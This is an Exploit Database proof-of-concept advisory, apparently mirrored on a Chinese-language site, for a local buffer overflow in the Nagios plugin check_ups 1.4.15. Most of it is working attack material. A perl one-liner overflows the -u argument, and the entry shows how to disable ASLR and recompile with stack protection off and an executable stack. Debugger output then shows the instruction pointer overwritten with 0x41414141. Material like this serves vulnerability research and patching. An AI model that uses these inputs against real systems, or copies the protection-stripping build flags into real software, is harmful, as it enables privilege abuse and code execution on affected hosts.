Nagios Plugins check_ups – Local Buffer Overflow (PoC)

• Exploit Database
• 25 阅读

• 作者： Stefan Schurtz
  日期： 2011-12-26
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/18278/

• #################################################################
  # Advisory:			Nagios Plugin 'check_ups' local buffer overflow
  # Author:				Stefan Schurtz
  # Contact:			s.schurtz@infoserve.de
  # Affected Software:		Successfully tested on nagios-plugins-1.4.15
  # Vendor URL:			http://nagiosplugins.org/
  #################################################################
  
  ./check_ups -u `perl -e 'print "A"x16407'`
  *** buffer overflow detected ***: ./check_ups terminated
  ======= Backtrace: =========
  /lib/libc.so.6(__fortify_fail+0x50)[0x25d970]
  /lib/libc.so.6(+0xe486a)[0x25c86a]
  /lib/libc.so.6(+0xe3fa8)[0x25bfa8]
  /lib/libc.so.6(_IO_default_xsputn+0x9e)[0x1e2a2e]
  /lib/libc.so.6(_IO_vfprintf+0x36b2)[0x1b88c2]
  /lib/libc.so.6(__vsprintf_chk+0xad)[0x25c05d]
  /lib/libc.so.6(__sprintf_chk+0x2d)[0x25bf9d]
  ./check_ups[0x8049e66]
  ./check_ups[0x804a105]
  ./check_ups[0x804a4ce]
  /lib/libc.so.6(__libc_start_main+0xe7)[0x18ece7]
  ./check_ups[0x80491a1]
  ======= Memory map: ========
  00110000-0012c000 r-xp 00000000 08:01 660177 /lib/ld-2.12.1.so
  0012c000-0012d000 r--p 0001b000 08:01 660177 /lib/ld-2.12.1.so
  0012d000-0012e000 rw-p 0001c000 08:01 660177 /lib/ld-2.12.1.so
  0012e000-0012f000 r-xp 00000000 00:00 0[vdso]
  0012f000-00142000 r-xp 00000000 08:01 660186 /lib/libnsl-2.12.1.so
  00142000-00143000 r--p 00012000 08:01 660186 /lib/libnsl-2.12.1.so
  00143000-00144000 rw-p 00013000 08:01 660186 /lib/libnsl-2.12.1.so
  00144000-00146000 rw-p 00000000 00:00 0
  
  // Compile without stack protection
  
  sysctl -w kernel.randomize_va_space=0
  
  cd plugins/
  
  gcc -fno-stack-protector -z execstack -DNP_VERSION=\"1.4.15\" -g -o check_ups check_ups.c netutils.o utils.o -L/usr/src/nagios-plugins-1.4.15/plugins ../lib/libnagiosplug.a ../gl/libgnu.a -DLOCALEDIR=\"/usr/local/nagios/share/locale\" -I../lib -I../gl -I../intl -I..
  
  // next test
  
  ./check_ups -u `perl -e 'print "A"x16408'`
  Connection refused
  Invalid response received from host
  Segmentation fault
  
  (gdb) run -u `perl -e 'print "A"x16408'`
  The program being debugged has been started already.
  Start it from the beginning? (y or n) y
  Starting program: /usr/src/nagios-plugins-1.4.15/plugins/check_ups -u `perl -e 'print "A"x16408'`
  Connection refused
  Invalid response received from host
  
  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  (gdb) i r
  eax0xffffffff -1
  ecx0x2914e0 2692320
  edx0x292360 2696032
  ebx0x41414141 1094795585
  esp0xbfff56f0 0xbfff56f0
  ebp0x41414141 0x41414141 <--- AAAA
  esi0x00
  edi0x00
  eip0x41414141 0x41414141 <--- AAAA
  eflags 0x10286[ PF SF IF RF ]
  cs 0x73 115
  ss 0x7b 123
  ds 0x7b 123
  es 0x7b 123
  fs 0x00
  gs 0x33 51